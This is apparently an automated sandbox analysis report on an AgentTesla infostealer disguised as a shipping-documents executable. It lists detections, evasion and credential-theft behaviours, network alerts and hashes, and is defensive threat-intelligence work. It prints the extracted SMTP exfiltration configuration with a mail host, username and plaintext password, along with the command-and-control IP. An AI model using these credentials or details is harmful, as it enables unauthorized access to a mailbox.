Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documents of shipment 3-2024.exe

Overview

General Information

Sample name:Documents of shipment 3-2024.exe
Analysis ID:1408242
MD5:779222c4ace4e7726fc76dedb4394b77
SHA1:da183b07419ffb0fa4b72230cf540e8a09c64a65
SHA256:664db26a69e4b1efb10289189887c35558bf7ca966eed02f97e523fef83f1205
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2487661512.00000000031F6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.2487661512.00000000031EE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000003.00000002.2487661512.00000000031A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              1.2.Documents of shipment 3-2024.exe.374f338.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.Documents of shipment 3-2024.exe.374f338.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.Documents of shipment 3-2024.exe.374f338.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x316c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31735:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x317bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31851:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x318bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x3192d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x319c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x31a53:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  3.2.Documents of shipment 3-2024.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    3.2.Documents of shipment 3-2024.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 12 entries

                      System Summary

                      barindex
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Documents of shipment 3-2024.exe, Initiated: true, ProcessId: 7644, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49707
                      Timestamp:03/13/24-14:24:42.198173
                      SID:2855542
                      Source Port:49707
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/13/24-14:24:42.198173
                      SID:2855245
                      Source Port:49707
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/13/24-14:24:42.198173
                      SID:2851779
                      Source Port:49707
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/13/24-14:24:42.198173
                      SID:2840032
                      Source Port:49707
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/13/24-14:24:42.198070
                      SID:2030171
                      Source Port:49707
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/13/24-14:24:42.198070
                      SID:2839723
                      Source Port:49707
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Documents of shipment 3-2024.exeAvira: detected
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
                      Source: Documents of shipment 3-2024.exeReversingLabs: Detection: 50%
                      Source: Documents of shipment 3-2024.exeVirustotal: Detection: 68%Perma Link
                      Source: Documents of shipment 3-2024.exeJoe Sandbox ML: detected
                      Source: Documents of shipment 3-2024.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: Documents of shipment 3-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.374f338.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: Joe Sandbox ViewIP Address: 50.87.139.143 50.87.139.143
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: global trafficTCP traffic: 192.168.2.10:49707 -> 50.87.139.143:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownDNS traffic detected: queries for: mail.elec-qatar.com
                      Source: Documents of shipment 3-2024.exe, 00000003.00000002.2487661512.00000000031F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elec-qatar.com
                      Source: Documents of shipment 3-2024.exe, 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, Documents of shipment 3-2024.exe, 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, NmHr1WHWKO.cs.Net Code: IiB
                      Source: 1.2.Documents of shipment 3-2024.exe.374f338.2.raw.unpack, NmHr1WHWKO.cs.Net Code: IiB

                      System Summary

                      barindex
                      Source: 1.2.Documents of shipment 3-2024.exe.374f338.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 3.2.Documents of shipment 3-2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.Documents of shipment 3-2024.exe.374f338.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: initial sampleStatic PE information: Filename: Documents of shipment 3-2024.exe
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_022883B01_2_022883B0
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_022886D81_2_022886D8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_022873301_2_02287330
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_022884511_2_02288451
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_022873261_2_02287326
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_0228736A1_2_0228736A
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_0228780B1_2_0228780B
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_067B5BE81_2_067B5BE8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_067B35E11_2_067B35E1
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_067B15D01_2_067B15D0
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_067B00401_2_067B0040
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_067B18401_2_067B1840
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_087800401_2_08780040
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_087822201_2_08782220
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_0878F8581_2_0878F858
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_0878F8491_2_0878F849
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_087873791_2_08787379
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_087873881_2_08787388
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_0878F4201_2_0878F420
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_015D93783_2_015D9378
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_015D9B303_2_015D9B30
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_015D4A983_2_015D4A98
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_015DCDA83_2_015DCDA8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_015D3E803_2_015D3E80
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_015D41C83_2_015D41C8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D56C83_2_066D56C8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D3F403_2_066D3F40
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066DDCF83_2_066DDCF8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066DBCF03_2_066DBCF0
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D2AF83_2_066D2AF8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D9AD03_2_066D9AD0
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D8B803_2_066D8B80
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D00403_2_066D0040
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D4FE83_2_066D4FE8
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 3_2_066D32483_2_066D3248
                      Source: Documents of shipment 3-2024.exe, 00000001.00000002.1245351308.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Documents of shipment 3-2024.exe
                      Source: Documents of shipment 3-2024.exe, 00000001.00000002.1246801206.000000000251C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs Documents of shipment 3-2024.exe
                      Source: Documents of shipment 3-2024.exe, 00000001.00000002.1249994593.0000000006AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Documents of shipment 3-2024.exe
                      Source: Documents of shipment 3-2024.exe, 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs Documents of shipment 3-2024.exe
                      Source: Documents of shipment 3-2024.exe, 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Documents of shipment 3-2024.exe
                      Source: Documents of shipment 3-2024.exe, 00000003.00000002.2485139424.00000000012F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Documents of shipment 3-2024.exe
                      Source: Documents of shipment 3-2024.exe, 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs Documents of shipment 3-2024.exe
                      Source: Documents of shipment 3-2024.exeBinary or memory string: OriginalFilenameZOtz.exe< vs Documents of shipment 3-2024.exe
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: Documents of shipment 3-2024.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 1.2.Documents of shipment 3-2024.exe.374f338.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.Documents of shipment 3-2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.Documents of shipment 3-2024.exe.374f338.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Documents of shipment 3-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, QVE6fvyfY6nuXQ1y2a.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, L1THh1BjLYfAt0yqQB.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, L1THh1BjLYfAt0yqQB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, L1THh1BjLYfAt0yqQB.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Documents of shipment 3-2024.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMutant created: NULL
                      Source: Documents of shipment 3-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Documents of shipment 3-2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Documents of shipment 3-2024.exeReversingLabs: Detection: 50%
                      Source: Documents of shipment 3-2024.exeVirustotal: Detection: 68%
                      Source: unknownProcess created: C:\Users\user\Desktop\Documents of shipment 3-2024.exe C:\Users\user\Desktop\Documents of shipment 3-2024.exe
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess created: C:\Users\user\Desktop\Documents of shipment 3-2024.exe C:\Users\user\Desktop\Documents of shipment 3-2024.exe
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess created: C:\Users\user\Desktop\Documents of shipment 3-2024.exe C:\Users\user\Desktop\Documents of shipment 3-2024.exeJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Documents of shipment 3-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Documents of shipment 3-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: Documents of shipment 3-2024.exe, --.cs.Net Code: _0002 System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, L1THh1BjLYfAt0yqQB.cs.Net Code: Tp0ZJno33v2Lf4H90qV System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_04A52E20 pushad ; iretd 1_2_04A52E21
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeCode function: 1_2_0878331E pushad ; ret 1_2_08783321
                      Source: Documents of shipment 3-2024.exeStatic PE information: section name: .text entropy: 7.988555037607642
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, LY9WGgoMp5W6Ls47W9.csHigh entropy of concatenated method names: 'LHi98FWZep', 'p4M9ixVqgj', 'SkT9bYCkfZ', 'm8ebUZW1xs', 'e4BbzQBeaS', 'A4D9ZrhblG', 'FQo92xQ1Pw', 'OI09IHN5Xy', 'RCR9gfoFMQ', 'zoJ9AVHb8u'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, k3Hp3OrSCTWFTJ5OT9.csHigh entropy of concatenated method names: 'KhAMdUc7rt', 'j66MW5j9kH', 'fI2iSAgTgr', 'SVhiCC9uYT', 'jLEixAvbXP', 's2xiu26uwd', 'IP8ioMiZqC', 'acjiTwrbG0', 'ViFi3697NE', 'PV2iRqj6Ku'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, l2N8Wpqy0LebEdWDSs.csHigh entropy of concatenated method names: 'HigjRkng4F', 'XmHjFrOeLy', 'wYijqA7v6x', 'Kuhj7ydvYO', 'D7sj5KI7eT', 'zBijSX88a7', 'Ts5jCiIPET', 'ynojxWaYSm', 'RLNjuRUofN', 'my3jo6wvy7'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, CWfQjmDbvcXPECMA27.csHigh entropy of concatenated method names: 'PPiQsdfL3I', 'jqeQURYsGa', 'BLmeZI1JPr', 'iaue2kv6AB', 'CrpQHDGQDg', 'NNmQFpAbjG', 'zRhQNOscUC', 'mZXQqCrPP3', 'xBEQ7jmGos', 'OI3Qvjf5O7'
